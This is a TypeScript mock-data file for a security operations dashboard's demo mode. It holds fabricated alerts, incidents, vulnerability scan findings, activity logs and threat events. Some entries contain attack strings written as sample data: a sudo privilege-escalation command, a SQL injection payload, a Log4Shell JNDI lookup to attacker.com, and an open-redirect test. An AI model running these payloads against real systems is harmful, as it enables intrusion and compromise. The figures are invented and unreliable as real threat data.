/**
 * Mock Data for Demo Mode
 * Realistic cybersecurity data for demonstration
 */
import type {
  Alert,
  ThreatEvent,
  Incident,
  ScanReport,
  InfrastructureNode,
  ActivityLog,
  Notification,
} from './database.types';

// ── Threat Timeline (last 7 days) ──────────────────────────────
export const threatTimelineData = [
  { time: '00:00', critical: 2, high: 5, medium: 8, low: 12 },
  { time: '02:00', critical: 4, high: 7, medium: 11, low: 15 },
  { time: '04:00', critical: 1, high: 3, medium: 6, low: 9 },
  { time: '06:00', critical: 3, high: 8, medium: 14, low: 20 },
  { time: '08:00', critical: 6, high: 12, medium: 18, low: 25 },
  { time: '10:00', critical: 8, high: 15, medium: 22, low: 30 },
  { time: '12:00', critical: 5, high: 10, medium: 16, low: 22 },
  { time: '14:00', critical: 9, high: 18, medium: 25, low: 35 },
  { time: '16:00', critical: 7, high: 14, medium: 20, low: 28 },
  { time: '18:00', critical: 4, high: 9, medium: 13, low: 19 },
  { time: '20:00', critical: 6, high: 11, medium: 17, low: 24 },
  { time: '22:00', critical: 3, high: 7, medium: 10, low: 16 },
];

export const weeklyThreatData = [
  { day: 'Mon', threats: 145, blocked: 132, incidents: 3 },
  { day: 'Tue', threats: 198, blocked: 187, incidents: 5 },
  { day: 'Wed', threats: 167, blocked: 155, incidents: 4 },
  { day: 'Thu', threats: 223, blocked: 208, incidents: 7 },
  { day: 'Fri', threats: 312, blocked: 289, incidents: 9 },
  { day: 'Sat', threats: 89, blocked: 84, incidents: 2 },
  { day: 'Sun', threats: 67, blocked: 63, incidents: 1 },
];

// ── Geo Threat Data ─────────────────────────────────────────────
export const geoThreatData = [
  { country: 'China', code: 'CN', attacks: 3421, flag: '🇨🇳', color: '#ef4444' },
  { country: 'Russia', code: 'RU', attacks: 2187, flag: '🇷🇺', color: '#f97316' },
  { country: 'North Korea', code: 'KP', attacks: 1654, flag: '🇰🇵', color: '#ef4444' },
  { country: 'Iran', code: 'IR', attacks: 1243, flag: '🇮🇷', color: '#f97316' },
  { country: 'Brazil', code: 'BR', attacks: 987, flag: '🇧🇷', color: '#eab308' },
  { country: 'United States', code: 'US', attacks: 876, flag: '🇺🇸', color: '#eab308' },
  { country: 'Nigeria', code: 'NG', attacks: 654, flag: '🇳🇬', color: '#22c55e' },
  { country: 'India', code: 'IN', attacks: 543, flag: '🇮🇳', color: '#22c55e' },
  { country: 'Ukraine', code: 'UA', attacks: 432, flag: '🇺🇦', color: '#22c55e' },
  { country: 'Germany', code: 'DE', attacks: 321, flag: '🇩🇪', color: '#3b82f6' },
];

// ── Attack Type Distribution ────────────────────────────────────
export const attackTypeData = [
  { name: 'Brute Force', value: 28, color: '#ef4444' },
  { name: 'SQL Injection', value: 22, color: '#f97316' },
  { name: 'Phishing', value: 18, color: '#eab308' },
  { name: 'DDoS', value: 15, color: '#3b82f6' },
  { name: 'Malware', value: 12, color: '#8b5cf6' },
  { name: 'Zero-day', value: 5, color: '#ec4899' },
];

// ── Alerts ──────────────────────────────────────────────────────
export const mockAlerts: Alert[] = [
  {
    id: 'alert-001',
    title: 'Brute Force Attack Detected',
    description: 'Multiple failed login attempts from 203.0.113.45 targeting SSH service',
    severity: 'critical',
    status: 'open',
    source: 'IDS',
    source_ip: '203.0.113.45',
    destination_ip: '10.0.1.10',
    affected_asset: 'PROD-WEB-01',
    category: 'Intrusion',
    tags: ['brute-force', 'authentication', 'ssh'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { attempts: 247, duration: '15m' },
    created_at: new Date(Date.now() - 1000 * 60 * 5).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 5).toISOString(),
  },
  {
    id: 'alert-002',
    title: 'Ransomware Signature Detected',
    description: 'File encryption behavior consistent with LockBit ransomware variant',
    severity: 'critical',
    status: 'investigating',
    source: 'EDR',
    source_ip: '10.0.5.45',
    destination_ip: null,
    affected_asset: 'WORKSTATION-07',
    category: 'Malware',
    tags: ['ransomware', 'lockbit', 'encryption'],
    assigned_to: 'demo-analyst-id',
    resolved_at: null,
    resolved_by: null,
    raw_data: { process: 'svchost.exe', files_encrypted: 143 },
    created_at: new Date(Date.now() - 1000 * 60 * 22).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 15).toISOString(),
  },
  {
    id: 'alert-003',
    title: 'Suspicious Outbound Traffic',
    description: 'Unusual data exfiltration pattern detected on port 4444 to C2 server',
    severity: 'high',
    status: 'investigating',
    source: 'Firewall',
    source_ip: '10.0.1.25',
    destination_ip: '185.220.101.46',
    affected_asset: 'PROD-DB-01',
    category: 'Data Exfiltration',
    tags: ['exfiltration', 'c2', 'data-loss'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { bytes_out: 524288000, port: 4444 },
    created_at: new Date(Date.now() - 1000 * 60 * 45).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 40).toISOString(),
  },
  {
    id: 'alert-004',
    title: 'Privilege Escalation Attempt',
    description: 'User jdoe attempted to escalate privileges via sudo exploit CVE-2023-22809',
    severity: 'high',
    status: 'open',
    source: 'SIEM',
    source_ip: '10.0.1.15',
    destination_ip: null,
    affected_asset: 'PROD-WEB-01',
    category: 'Privilege Abuse',
    tags: ['privilege-escalation', 'sudo', 'cve-2023-22809'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { user: 'jdoe', command: 'sudo -u#-1 /bin/bash' },
    created_at: new Date(Date.now() - 1000 * 60 * 90).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 90).toISOString(),
  },
  {
    id: 'alert-005',
    title: 'SQL Injection Attempt Blocked',
    description: 'WAF blocked SQL injection payload targeting customer login endpoint',
    severity: 'high',
    status: 'resolved',
    source: 'WAF',
    source_ip: '198.51.100.23',
    destination_ip: '10.0.1.10',
    affected_asset: 'customer-portal',
    category: 'Web Attack',
    tags: ['sqli', 'web', 'waf'],
    assigned_to: 'demo-analyst-id',
    resolved_at: new Date(Date.now() - 1000 * 60 * 120).toISOString(),
    resolved_by: 'demo-analyst-id',
    raw_data: { payload: "' OR 1=1--", endpoint: '/api/auth/login' },
    created_at: new Date(Date.now() - 1000 * 60 * 180).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 120).toISOString(),
  },
  {
    id: 'alert-006',
    title: 'Zero-day Exploit Attempt',
    description: 'Attempted exploitation of CVE-2024-9999 in VPN gateway firmware',
    severity: 'critical',
    status: 'open',
    source: 'IDS',
    source_ip: '185.220.101.46',
    destination_ip: '10.0.0.5',
    affected_asset: 'CORP-VPN-01',
    category: 'Exploit',
    tags: ['zero-day', 'vpn', 'cve-2024-9999'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { exploit_signature: 'CVE-2024-9999', firmware_version: '12.3.1' },
    created_at: new Date(Date.now() - 1000 * 60 * 12).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 12).toISOString(),
  },
  {
    id: 'alert-007',
    title: 'DDoS Attack Mitigated',
    description: 'Volumetric UDP flood DDoS attack mitigated — peak 45.2 Gbps',
    severity: 'high',
    status: 'resolved',
    source: 'Firewall',
    source_ip: null,
    destination_ip: '10.0.0.1',
    affected_asset: 'PROD-FW-01',
    category: 'DDoS',
    tags: ['ddos', 'udp-flood', 'availability'],
    assigned_to: 'demo-admin-id',
    resolved_at: new Date(Date.now() - 1000 * 60 * 240).toISOString(),
    resolved_by: 'demo-admin-id',
    raw_data: { peak_gbps: 45.2, duration: '8m', packets_dropped: 2847291 },
    created_at: new Date(Date.now() - 1000 * 60 * 280).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 240).toISOString(),
  },
  {
    id: 'alert-008',
    title: 'Anomalous Login — Impossible Travel',
    description: 'User admin@corp.com logged in from Seoul, KR then London, UK within 45 minutes',
    severity: 'critical',
    status: 'investigating',
    source: 'UEBA',
    source_ip: '175.45.176.0',
    destination_ip: null,
    affected_asset: 'Identity',
    category: 'Identity Threat',
    tags: ['impossible-travel', 'account-compromise', 'ueba'],
    assigned_to: 'demo-analyst-id',
    resolved_at: null,
    resolved_by: null,
    raw_data: { user: 'admin@corp.com', locations: ['Seoul, KR', 'London, UK'], time_diff: '45m' },
    created_at: new Date(Date.now() - 1000 * 60 * 35).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 30).toISOString(),
  },
  {
    id: 'alert-009',
    title: 'Outdated SSL/TLS Certificate',
    description: 'SSL certificate for api.internal expires in 6 days — renewal required',
    severity: 'medium',
    status: 'open',
    source: 'Certificate Monitor',
    source_ip: null,
    destination_ip: null,
    affected_asset: 'api.internal',
    category: 'Configuration',
    tags: ['ssl', 'certificate', 'expiry'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { domain: 'api.internal', expires: new Date(Date.now() + 1000 * 60 * 60 * 24 * 6).toISOString() },
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 2).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 60 * 2).toISOString(),
  },
  {
    id: 'alert-010',
    title: 'Port Scan Detected',
    description: 'Systematic full-port scan from 45.33.32.156 targeting DMZ subnet',
    severity: 'medium',
    status: 'open',
    source: 'IDS',
    source_ip: '45.33.32.156',
    destination_ip: null,
    affected_asset: 'DMZ Subnet',
    category: 'Reconnaissance',
    tags: ['port-scan', 'recon', 'nmap'],
    assigned_to: null,
    resolved_at: null,
    resolved_by: null,
    raw_data: { ports_scanned: 65535, scan_tool: 'Nmap SYN scan' },
    created_at: new Date(Date.now() - 1000 * 60 * 8).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 8).toISOString(),
  },
];

// ── Infrastructure Nodes ────────────────────────────────────────
export const mockNodes: InfrastructureNode[] = [
  {
    id: 'node-001', name: 'PROD-WEB-01', type: 'server', ip_address: '10.0.1.10',
    status: 'online', cpu_usage: 45.2, memory_usage: 62.8, disk_usage: 71.3,
    last_seen: new Date().toISOString(), metadata: { os: 'Ubuntu 22.04', uptime: '47d' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-002', name: 'PROD-DB-01', type: 'database', ip_address: '10.0.1.20',
    status: 'online', cpu_usage: 28.9, memory_usage: 78.4, disk_usage: 55.6,
    last_seen: new Date().toISOString(), metadata: { engine: 'PostgreSQL 15', uptime: '47d' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-003', name: 'PROD-FW-01', type: 'firewall', ip_address: '10.0.0.1',
    status: 'online', cpu_usage: 12.1, memory_usage: 34.2, disk_usage: 22.1,
    last_seen: new Date().toISOString(), metadata: { vendor: 'Palo Alto', model: 'PA-3260' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-004', name: 'PROD-LB-01', type: 'router', ip_address: '10.0.0.5',
    status: 'degraded', cpu_usage: 89.3, memory_usage: 91.2, disk_usage: 44.8,
    last_seen: new Date(Date.now() - 1000 * 60 * 2).toISOString(), metadata: { vendor: 'F5', model: 'BIG-IP' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-005', name: 'PROD-CACHE-01', type: 'server', ip_address: '10.0.1.30',
    status: 'online', cpu_usage: 33.7, memory_usage: 48.9, disk_usage: 38.2,
    last_seen: new Date().toISOString(), metadata: { service: 'Redis 7.2', uptime: '12d' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-006', name: 'CORP-VPN-01', type: 'server', ip_address: '10.0.2.10',
    status: 'offline', cpu_usage: 0, memory_usage: 0, disk_usage: 0,
    last_seen: new Date(Date.now() - 1000 * 60 * 45).toISOString(), metadata: { service: 'OpenVPN', reason: 'Security incident' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-007', name: 'MONITORING-01', type: 'server', ip_address: '10.0.3.10',
    status: 'online', cpu_usage: 22.4, memory_usage: 56.1, disk_usage: 29.7,
    last_seen: new Date().toISOString(), metadata: { service: 'Grafana/Prometheus', uptime: '30d' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
  {
    id: 'node-008', name: 'BACKUP-SRV-01', type: 'server', ip_address: '10.0.4.10',
    status: 'maintenance', cpu_usage: 5.2, memory_usage: 18.3, disk_usage: 92.4,
    last_seen: new Date(Date.now() - 1000 * 60 * 10).toISOString(), metadata: { service: 'Veeam', window: 'Scheduled' },
    created_at: new Date().toISOString(), updated_at: new Date().toISOString(),
  },
];

// ── Incidents ───────────────────────────────────────────────────
export const mockIncidents: Incident[] = [
  {
    id: 'inc-001',
    title: 'LockBit Ransomware Infection — WORKSTATION-07',
    description: 'Ransomware infection detected and contained on WORKSTATION-07. Files being restored from backup.',
    status: 'in_progress',
    priority: 'critical',
    category: 'Malware',
    affected_systems: ['WORKSTATION-07', 'PROD-FILE-01'],
    assigned_to: 'demo-analyst-id',
    created_by: 'demo-admin-id',
    resolved_at: null,
    resolution_notes: null,
    alert_ids: ['alert-002'],
    timeline: [
      { timestamp: new Date(Date.now() - 1000 * 60 * 90).toISOString(), action: 'Incident Created', user: 'System', notes: 'Automatically created from alert-002' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 80).toISOString(), action: 'Assigned', user: 'Alex Admin', notes: 'Assigned to Sam Analyst for investigation' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 70).toISOString(), action: 'Containment', user: 'Sam Analyst', notes: 'Host isolated from network. Backup restoration initiated.' },
    ],
    created_at: new Date(Date.now() - 1000 * 60 * 90).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 70).toISOString(),
  },
  {
    id: 'inc-002',
    title: 'Account Compromise — Impossible Travel Detected',
    description: 'Admin account showing signs of compromise via credential theft. MFA bypass suspected.',
    status: 'in_progress',
    priority: 'critical',
    category: 'Identity Threat',
    affected_systems: ['Identity Provider', 'Active Directory'],
    assigned_to: 'demo-analyst-id',
    created_by: 'demo-admin-id',
    resolved_at: null,
    resolution_notes: null,
    alert_ids: ['alert-008'],
    timeline: [
      { timestamp: new Date(Date.now() - 1000 * 60 * 40).toISOString(), action: 'Incident Created', user: 'System', notes: 'UEBA triggered impossible travel detection' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 35).toISOString(), action: 'User Suspended', user: 'Alex Admin', notes: 'Account temporarily suspended pending investigation' },
    ],
    created_at: new Date(Date.now() - 1000 * 60 * 40).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 35).toISOString(),
  },
  {
    id: 'inc-003',
    title: 'VPN Gateway Outage — Security Incident',
    description: 'CORP-VPN-01 taken offline following zero-day exploit attempt. Pending patch deployment.',
    status: 'open',
    priority: 'high',
    category: 'Availability',
    affected_systems: ['CORP-VPN-01'],
    assigned_to: null,
    created_by: 'demo-admin-id',
    resolved_at: null,
    resolution_notes: null,
    alert_ids: ['alert-006'],
    timeline: [
      { timestamp: new Date(Date.now() - 1000 * 60 * 15).toISOString(), action: 'Incident Created', user: 'Alex Admin', notes: 'VPN taken offline as precautionary measure' },
    ],
    created_at: new Date(Date.now() - 1000 * 60 * 15).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 15).toISOString(),
  },
  {
    id: 'inc-004',
    title: 'DDoS Attack — Successfully Mitigated',
    description: 'UDP flood DDoS attack targeting web frontend. Peak 45.2 Gbps. Mitigated via upstream null-route.',
    status: 'resolved',
    priority: 'high',
    category: 'DDoS',
    affected_systems: ['PROD-FW-01', 'web-frontend'],
    assigned_to: 'demo-admin-id',
    created_by: 'demo-admin-id',
    resolved_at: new Date(Date.now() - 1000 * 60 * 240).toISOString(),
    resolution_notes: 'Attack mitigated via upstream BGP null-route. Services fully restored. Source IPs added to block list.',
    alert_ids: ['alert-007'],
    timeline: [
      { timestamp: new Date(Date.now() - 1000 * 60 * 280).toISOString(), action: 'Incident Created', user: 'System', notes: 'DDoS attack detected' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 275).toISOString(), action: 'Mitigation Started', user: 'Alex Admin', notes: 'Contacted upstream ISP' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 240).toISOString(), action: 'Resolved', user: 'Alex Admin', notes: 'Attack subsided. Null-route removed. Services normal.' },
    ],
    created_at: new Date(Date.now() - 1000 * 60 * 280).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 240).toISOString(),
  },
  {
    id: 'inc-005',
    title: 'Data Exfiltration Attempt — DB Server',
    description: 'Unusual outbound traffic from PROD-DB-01 to known C2 infrastructure.',
    status: 'in_progress',
    priority: 'critical',
    category: 'Data Exfiltration',
    affected_systems: ['PROD-DB-01', 'customer-data'],
    assigned_to: 'demo-analyst-id',
    created_by: 'demo-admin-id',
    resolved_at: null,
    resolution_notes: null,
    alert_ids: ['alert-003'],
    timeline: [
      { timestamp: new Date(Date.now() - 1000 * 60 * 50).toISOString(), action: 'Incident Created', user: 'System', notes: 'Firewall alert correlated with SIEM rule' },
      { timestamp: new Date(Date.now() - 1000 * 60 * 45).toISOString(), action: 'Traffic Blocked', user: 'Sam Analyst', notes: 'Outbound connection to C2 blocked at firewall level' },
    ],
    created_at: new Date(Date.now() - 1000 * 60 * 50).toISOString(),
    updated_at: new Date(Date.now() - 1000 * 60 * 45).toISOString(),
  },
];

// ── Scan Reports ────────────────────────────────────────────────
export const mockScanReports: ScanReport[] = [
  {
    id: 'scan-001',
    user_id: 'demo-admin-id',
    target: 'example-corp.com',
    target_type: 'domain',
    status: 'completed',
    progress: 100,
    findings: [
      {
        id: 'vuln-001',
        title: 'Apache Log4Shell (Log4j RCE)',
        description: 'The application uses Apache Log4j 2.x versions vulnerable to remote code execution via JNDI lookup.',
        severity: 'critical',
        cvss_score: 10.0,
        cvss_vector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H',
        cve_ids: ['CVE-2021-44228'],
        affected_component: 'Apache Log4j 2.0-beta9 to 2.14.1',
        remediation: 'Upgrade Log4j to 2.17.1+ or apply vendor-provided mitigation. Disable JNDI lookups via log4j2.formatMsgNoLookups=true.',
        references: ['https://nvd.nist.gov/vuln/detail/CVE-2021-44228'],
        proof_of_concept: 'Payload: ${jndi:ldap://attacker.com/exploit} triggered RCE response',
      },
      {
        id: 'vuln-002',
        title: 'SSL/TLS — Weak Cipher Suites',
        description: 'Server supports weak cipher suites including RC4 and 3DES which are vulnerable to BEAST and SWEET32 attacks.',
        severity: 'high',
        cvss_score: 7.4,
        cvss_vector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N',
        cve_ids: ['CVE-2016-2183', 'CVE-2013-2566'],
        affected_component: 'TLS 1.0/1.1 cipher configuration',
        remediation: 'Disable TLS 1.0/1.1. Remove RC4 and 3DES cipher suites. Enable only TLS 1.2+ with AEAD ciphers.',
        references: ['https://nvd.nist.gov/vuln/detail/CVE-2016-2183'],
        proof_of_concept: 'TLS handshake shows TLS_RSA_WITH_3DES_EDE_CBC_SHA cipher accepted',
      },
      {
        id: 'vuln-003',
        title: 'Open Redirect Vulnerability',
        description: 'The application allows unvalidated redirects to external URLs via the ?redirect= parameter.',
        severity: 'medium',
        cvss_score: 6.1,
        cvss_vector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N',
        cve_ids: [],
        affected_component: '/auth/callback?redirect= endpoint',
        remediation: 'Implement allowlist-based redirect validation. Only allow redirects to same-origin URLs.',
        references: ['https://owasp.org/www-project-web-security-testing-guide/'],
        proof_of_concept: '/auth/callback?redirect=https://attacker.com redirected user',
      },
      {
        id: 'vuln-004',
        title: 'Missing HTTP Security Headers',
        description: 'Critical security headers are missing: Content-Security-Policy, X-Frame-Options, HSTS.',
        severity: 'medium',
        cvss_score: 5.3,
        cvss_vector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
        cve_ids: [],
        affected_component: 'HTTP Response Headers',
        remediation: 'Add Content-Security-Policy, Strict-Transport-Security, X-Frame-Options: DENY, X-Content-Type-Options: nosniff headers.',
        references: ['https://owasp.org/www-project-secure-headers/'],
        proof_of_concept: 'HTTP response headers analysis shows missing security headers',
      },
      {
        id: 'vuln-005',
        title: 'Server Version Disclosure',
        description: 'Server reveals version information in HTTP headers (Apache/2.4.49) facilitating targeted attacks.',
        severity: 'low',
        cvss_score: 3.7,
        cvss_vector: 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N',
        cve_ids: [],
        affected_component: 'Server HTTP Headers',
        remediation: 'Configure ServerTokens Prod and ServerSignature Off in Apache configuration.',
        references: ['https://httpd.apache.org/docs/2.4/mod/core.html#servertokens'],
        proof_of_concept: 'Server: Apache/2.4.49 (Ubuntu) header present in HTTP response',
      },
    ],
    summary: { critical: 1, high: 1, medium: 2, low: 1, info: 0, total: 5 },
    risk_score: 87,
    scan_duration: 142,
    scanner_version: '1.0.0',
    error_message: null,
    started_at: new Date(Date.now() - 1000 * 60 * 60 * 2).toISOString(),
    completed_at: new Date(Date.now() - 1000 * 60 * 60 * 2 + 142000).toISOString(),
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 2).toISOString(),
  },
  {
    id: 'scan-002',
    user_id: 'demo-admin-id',
    target: '192.168.1.100',
    target_type: 'ip',
    status: 'completed',
    progress: 100,
    findings: [
      {
        id: 'vuln-006',
        title: 'SMB EternalBlue (MS17-010)',
        description: 'Host is vulnerable to the EternalBlue SMB exploit used by WannaCry and NotPetya ransomware.',
        severity: 'critical',
        cvss_score: 9.8,
        cvss_vector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
        cve_ids: ['CVE-2017-0144'],
        affected_component: 'SMBv1 (Port 445)',
        remediation: 'Apply MS17-010 security patch immediately. Disable SMBv1 if not needed.',
        references: ['https://nvd.nist.gov/vuln/detail/CVE-2017-0144'],
        proof_of_concept: 'Metasploit module exploit/windows/smb/ms17_010_eternalblue confirmed vulnerable',
      },
      {
        id: 'vuln-007',
        title: 'Unpatched RDP BlueKeep',
        description: 'Remote Desktop Protocol vulnerable to pre-auth RCE via CVE-2019-0708 (BlueKeep).',
        severity: 'critical',
        cvss_score: 9.8,
        cvss_vector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
        cve_ids: ['CVE-2019-0708'],
        affected_component: 'RDP Service (Port 3389)',
        remediation: 'Apply KB4499175 patch. Enable NLA for RDP. Block RDP port 3389 from internet.',
        references: ['https://nvd.nist.gov/vuln/detail/CVE-2019-0708'],
        proof_of_concept: 'BlueKeep fingerprint matched on RDP pre-auth negotiation',
      },
    ],
    summary: { critical: 2, high: 0, medium: 0, low: 0, info: 1, total: 3 },
    risk_score: 96,
    scan_duration: 89,
    scanner_version: '1.0.0',
    error_message: null,
    started_at: new Date(Date.now() - 1000 * 60 * 60 * 24).toISOString(),
    completed_at: new Date(Date.now() - 1000 * 60 * 60 * 24 + 89000).toISOString(),
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 24).toISOString(),
  },
];

// ── Activity Logs ───────────────────────────────────────────────
export const mockActivityLogs: ActivityLog[] = [
  {
    id: 'log-001', user_id: 'demo-admin-id', action: 'LOGIN',
    resource_type: null, resource_id: null,
    details: { ip: '192.168.1.5', browser: 'Chrome/120' },
    ip_address: '192.168.1.5', user_agent: 'Chrome/120',
    created_at: new Date(Date.now() - 1000 * 60 * 2).toISOString(),
  },
  {
    id: 'log-002', user_id: 'demo-analyst-id', action: 'SCAN_CREATED',
    resource_type: 'scan_report', resource_id: 'scan-001',
    details: { target: 'example-corp.com', type: 'domain' },
    ip_address: '192.168.1.6', user_agent: 'Firefox/121',
    created_at: new Date(Date.now() - 1000 * 60 * 15).toISOString(),
  },
  {
    id: 'log-003', user_id: 'demo-admin-id', action: 'ALERT_UPDATED',
    resource_type: 'alert', resource_id: 'alert-005',
    details: { field: 'status', from: 'open', to: 'resolved' },
    ip_address: '192.168.1.5', user_agent: 'Chrome/120',
    created_at: new Date(Date.now() - 1000 * 60 * 30).toISOString(),
  },
  {
    id: 'log-004', user_id: 'demo-analyst-id', action: 'INCIDENT_CREATED',
    resource_type: 'incident', resource_id: 'inc-001',
    details: { title: 'LockBit Ransomware Infection', priority: 'critical' },
    ip_address: '192.168.1.6', user_agent: 'Firefox/121',
    created_at: new Date(Date.now() - 1000 * 60 * 90).toISOString(),
  },
  {
    id: 'log-005', user_id: 'demo-admin-id', action: 'ROLE_CHANGED',
    resource_type: 'profile', resource_id: 'demo-viewer-id',
    details: { target_user: 'viewer@sentinel.io', from: 'viewer', to: 'analyst' },
    ip_address: '192.168.1.5', user_agent: 'Chrome/120',
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 3).toISOString(),
  },
];

// ── Notifications ───────────────────────────────────────────────
export const mockNotifications: Notification[] = [
  {
    id: 'notif-001', user_id: 'demo-admin-id',
    title: 'Critical Alert: Ransomware Detected',
    message: 'LockBit ransomware signature detected on WORKSTATION-07. Immediate action required.',
    type: 'error', is_read: false,
    action_url: '/incidents/inc-001', metadata: {},
    created_at: new Date(Date.now() - 1000 * 60 * 5).toISOString(),
  },
  {
    id: 'notif-002', user_id: 'demo-admin-id',
    title: 'Scan Completed: example-corp.com',
    message: 'Vulnerability scan completed. Found 5 vulnerabilities including 1 critical.',
    type: 'warning', is_read: false,
    action_url: '/scanner', metadata: {},
    created_at: new Date(Date.now() - 1000 * 60 * 20).toISOString(),
  },
  {
    id: 'notif-003', user_id: 'demo-admin-id',
    title: 'DDoS Attack Mitigated',
    message: 'UDP flood attack has been successfully mitigated. Services are back to normal.',
    type: 'success', is_read: true,
    action_url: '/incidents/inc-004', metadata: {},
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 4).toISOString(),
  },
  {
    id: 'notif-004', user_id: 'demo-admin-id',
    title: 'SSL Certificate Expiring Soon',
    message: 'api.internal certificate expires in 6 days. Please renew immediately.',
    type: 'warning', is_read: false,
    action_url: '/alerts', metadata: {},
    created_at: new Date(Date.now() - 1000 * 60 * 60 * 2).toISOString(),
  },
];

// ── Threat Events ───────────────────────────────────────────────
export const mockThreatEvents: ThreatEvent[] = [
  {
    id: 'te-001', event_type: 'Brute Force', severity: 'high',
    country_code: 'CN', country_name: 'China', source_ip: '118.25.6.39',
    target_asset: 'SSH:22', attack_vector: 'Network', blocked: true,
    metadata: {}, created_at: new Date(Date.now() - 1000 * 60 * 3).toISOString(),
  },
  {
    id: 'te-002', event_type: 'SQL Injection', severity: 'critical',
    country_code: 'RU', country_name: 'Russia', source_ip: '95.213.121.200',
    target_asset: 'web-app/api', attack_vector: 'Application', blocked: true,
    metadata: {}, created_at: new Date(Date.now() - 1000 * 60 * 7).toISOString(),
  },
  {
    id: 'te-003', event_type: 'Malware C2', severity: 'critical',
    country_code: 'KP', country_name: 'North Korea', source_ip: '175.45.176.4',
    target_asset: 'WORKSTATION-07', attack_vector: 'Network', blocked: false,
    metadata: {}, created_at: new Date(Date.now() - 1000 * 60 * 22).toISOString(),
  },
  {
    id: 'te-004', event_type: 'Zero-day Exploit', severity: 'critical',
    country_code: 'IR', country_name: 'Iran', source_ip: '185.220.101.46',
    target_asset: 'CORP-VPN-01', attack_vector: 'Network', blocked: false,
    metadata: {}, created_at: new Date(Date.now() - 1000 * 60 * 12).toISOString(),
  },
  {
    id: 'te-005', event_type: 'DDoS', severity: 'high',
    country_code: 'BR', country_name: 'Brazil', source_ip: '189.1.1.50',
    target_asset: 'web-frontend', attack_vector: 'Network', blocked: true,
    metadata: {}, created_at: new Date(Date.now() - 1000 * 60 * 35).toISOString(),
  },
];

export const STATS = {
  totalThreats: 1247,
  activeAlerts: 6,
  criticalAlerts: 3,
  blockedAttacks: 1189,
  openIncidents: 3,
  riskScore: 72,
  assetsMonitored: 847,
  uptime: 99.2,
};
